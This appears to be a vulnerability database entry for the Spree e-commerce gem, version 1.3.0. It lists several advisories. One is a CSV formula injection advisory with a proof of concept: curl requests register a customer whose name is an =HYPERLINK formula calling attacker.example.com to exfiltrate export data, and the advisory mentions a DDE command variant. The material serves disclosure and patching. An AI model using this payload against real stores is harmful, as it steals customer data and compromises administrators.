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| purl | pkg:gem/spree@1.3.0 |
| Next non-vulnerable version | None. |
| Latest non-vulnerable version | None. |
| Risk | 4.0 |
| Vulnerability | Summary | Fixed by |
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VCID-153y-kwk2-xyfd
Aliases: GHSA-xf4v-w5x5-pv79 |
Spree: CSV Formula Injection in Customer Export ### Summary CSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted Export in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the context of the administrator's desktop, potentially exfiltrating data or executing OS commands via DDE (Dynamic Data Exchange). --- ### Details #### Affected presenters and fields | Presenter | Path | User-controlled fields | |---|---|---| | `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` | #### Vulnerable code — `customer_presenter.rb` (representative example) ```ruby # spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53 def call csv = [ customer.first_name, # ← written verbatim; may contain =HYPERLINK(...) customer.last_name, # ← user-controlled customer.email, customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no), customer.address&.company, # ← user-controlled customer.address&.address1, # ← user-controlled customer.address&.address2, # ← user-controlled customer.address&.city, # ← user-controlled customer.address&.state_text, customer.address&.state_abbr, customer.address&.country&.name, customer.address&.country&.iso, customer.address&.zipcode, customer.phone, # ← user-controlled customer.amount_spent_in(Spree::Store.current.default_currency), customer.completed_orders.count, ] csv += metafields_for_csv(customer) csv end ``` --- ### PoC **Precondition**: A Spree store with public customer registration enabled (default configuration). No special permissions required for the attacker. #### Step 1 — Register as a customer with an injected first name ```bash curl -X POST https://store.example.com/api/v3/store/customers \ -H "Content-Type: application/json" \ -H "X-Spree-Api-Key: pk_<publishable_api_key>" \ -d '{ "email": "attacker@evil.com", "password": "password123", "password_confirmation": "password123", "first_name": "=HYPERLINK(\"http://attacker.example.com/exfil?d=\"&B1,\"Click\")", "last_name": "Smith" }' ``` #### Step 2 — Admin triggers a customer export ```bash curl -X POST https://store.example.com/api/v3/admin/exports \ -H "Authorization: Bearer <admin_jwt>" \ -H "Content-Type: application/json" \ -d '{"type": "Spree::Exports::Customers", "record_selection": "all"}' ``` #### Step 3 — Admin polls until ready, then downloads ```bash # Poll for completion curl https://store.example.com/api/v3/admin/exports/<export_id> \ -H "Authorization: Bearer <admin_jwt>" # Download curl https://store.example.com/api/v3/admin/exports/<export_id>/download \ -H "Authorization: Bearer <admin_jwt>" \ -o customers.csv ``` #### Step 4 — Verify injection in the raw CSV (without opening in Excel) Open `customers.csv` in a text editor. The first data row will contain: ``` "=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")","Smith","attacker@evil.com",... ``` #### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows) - Excel warns about external data connections; if the administrator clicks **Enable**, the `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`. - Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain email, address, and order total data for all exported customers. - With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess is launched on the administrator's machine. --- ### Impact **Vulnerability class**: CSV / Formula Injection (CWE-1236) #### Who is impacted - **Administrators** who download and open export files in spreadsheet software are the direct victims. Administrative accounts have access to all store data, payment method configurations, customer PII, and full order history. #### Realistic attack chain | Step | Actor | Action | Privilege required | |---|---|---|---| | 1 | Attacker | Registers as customer | Public registration | | 2 | Attacker | Sets `first_name` to formula payload | None beyond registration | | 3 | Admin | Runs a routine weekly/monthly export | Normal operational task | | 4 | Admin | Opens CSV in Excel | None | | 5 | Attacker | Receives exfiltrated spreadsheet data | Passive | #### Data at risk All data visible to the administrator in the spreadsheet at the time of opening, including: - All exported customer emails, names, addresses, phone numbers - Order totals and purchase history - Any other columns in the same export file |
Affected by 1 other vulnerability. Affected by 1 other vulnerability. Affected by 1 other vulnerability. |
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VCID-cwh1-mmky-ukcx
Aliases: CVE-2020-15269 GHSA-f8cm-364f-q9qh |
Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls ### Impact The perpetrator who previously obtained an old expired user token could use it to access Storefront API v2 endpoints. ### Patches Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version. |
Affected by 2 other vulnerabilities. Affected by 2 other vulnerabilities. Affected by 2 other vulnerabilities. |
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VCID-s4mu-v75h-dfep
Aliases: OSVDB-119205 |
Private information access through CSRF A vulnerability in the API can allow an attacker to commit CSRF gaining access to private information. |
Affected by 2 other vulnerabilities. Affected by 2 other vulnerabilities. Affected by 2 other vulnerabilities. Affected by 2 other vulnerabilities. |
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VCID-t9gu-2vs3-g7cu
Aliases: CVE-2013-2506 GHSA-jp57-9j37-5476 OSV-90865 |
Permissions, Privileges, and Access Controls app/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves. |
Affected by 2 other vulnerabilities. |
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VCID-y37s-b27m-n7ad
Aliases: CVE-2013-1656 GHSA-jxx8-v83v-rhw3 |
Authenticated administrators to execute arbitrary commands Spree Commerce allow remote authenticated administrators to instantiate arbitrary Ruby objects and execute arbitrary commands via the (1) payment_method parameter to core/app/controllers/spree/admin/payment_methods_controller.rb; and the (2) promotion_action parameter to promotion_actions_controller.rb, (3) promotion_rule parameter to promotion_rules_controller.rb, and (4) calculator_type parameter to promotions_controller.rb in promo/app/controllers/spree/admin/, related to unsafe use of the constantize function. |
Affected by 4 other vulnerabilities. Affected by 3 other vulnerabilities. Affected by 3 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
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| VCID-t9gu-2vs3-g7cu | Permissions, Privileges, and Access Controls app/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves. |
CVE-2013-2506
GHSA-jp57-9j37-5476 OSV-90865 |